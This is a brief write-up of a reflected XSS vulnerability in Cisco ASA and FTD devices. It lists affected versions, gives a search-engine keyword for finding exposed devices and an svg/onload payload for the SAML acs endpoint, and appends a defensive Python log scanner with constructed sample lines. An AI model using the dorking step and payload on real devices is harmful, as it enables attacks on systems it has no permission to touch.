1. Preface
I ran into this vulnerability a while ago, so I'm writing it down!
2. Vulnerability description
This vulnerability is an unauthenticated reflected XSS vulnerability in Cisco ASA and Cisco FTD devices. The affected versions are as follows:
- Cisco ASA Software 9.6
- Cisco ASA Software 9.7
- Cisco ASA Software 9.8
- Cisco ASA Software 9.9
- Cisco ASA Software 9.10
- Cisco ASA Software 9.12
- Cisco ASA Software 9.13
- Cisco ASA Software 9.14
- Cisco ASA Software 9.15
- Cisco FTD Software 6.2.2
- Cisco FTD Software 6.2.3
- Cisco FTD Software 6.3.0
- Cisco FTD Software 6.4.0
- Cisco FTD Software 6.5.0
- Cisco FTD Software 6.6.0
- Cisco FTD Software 6.7.0
3. Vulnerability reproduction
First, use zoomeye or fofa to search for devices; the search keyword is /+CSCOE+/. The vulnerability is in the /+CSCOE+/saml/sp/acs endpoint, and the PoC is SAMLResponse="><svg/onload=alert('XSS')>. After visiting the device, modify the request packet to the PoC, as shown in the figure below:
Then forward it, as shown in the figure below:
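A defender-side check for the endpoint and parameter discussed above, added here as an example and not part of the original write-up: it scans access-log lines for requests to /+CSCOE+/saml/sp/acs whose SAMLResponse value is not the base64 blob a real SAML assertion would be. The combined log format and the sample lines are constructed assumptions; the ASA's own logging differs, and a payload sent in a POST body would only be visible in a proxy or WAF log that records request bodies.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the write-up above.
ACS_PATH = "/+CSCOE+/saml/sp/acs"
PARAM = "SAMLResponse"

# A legitimate SAMLResponse is a base64 blob (standard or URL-safe alphabet);
# parse_qs turns '+' into a space, so whitespace is tolerated too.
_BASE64_RE = re.compile(r"^[A-Za-z0-9+/=_\-\s]*$")
# Markup characters can never appear in base64, so they mark a reflected-XSS probe.
_MARKUP_RE = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)

# Assumed Apache/nginx "combined" access-log layout (constructed for this example).
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)


def classify_saml_response(value):
    """Return 'ok' for a base64-looking value, 'markup' if it carries HTML/JS
    characters, and 'malformed' for anything else."""
    if _BASE64_RE.match(value):
        return "ok"
    if _MARKUP_RE.search(value):
        return "markup"
    return "malformed"


def check_request(target):
    """Inspect a request target (path + query). Returns None when the request is
    not the acs endpoint with a SAMLResponse, otherwise the worst verdict seen."""
    parts = urlsplit(target)
    if parts.path != ACS_PATH:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if not values:
        return None
    verdicts = {classify_saml_response(v) for v in values}
    return "markup" if "markup" in verdicts else ("malformed" if "malformed" in verdicts else "ok")


def scan_log(lines):
    """Return (client_ip, timestamp, verdict, target) for every flagged line."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m and check_request(m["target"]) not in (None, "ok"):
            hits.append((m["ip"], m["ts"], check_request(m["target"]), m["target"]))
    return hits


# Constructed sample lines: a normal SAML post-back, the page's PoC, an unrelated page.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2021:13:55:36 +0000] "GET /+CSCOE+/saml/sp/acs?SAMLResponse=PHNhbWxwOlJlc3BvbnNlPg== HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2021:13:57:01 +0000] "GET /+CSCOE+/saml/sp/acs?SAMLResponse=%22%3E%3Csvg/onload%3Dalert(%27XSS%27)%3E HTTP/1.1" 200 1024',
    '203.0.113.9 - - [10/Oct/2021:13:57:05 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only the second constructed line is reported; the base64 post-back and the unrelated page pass through untouched.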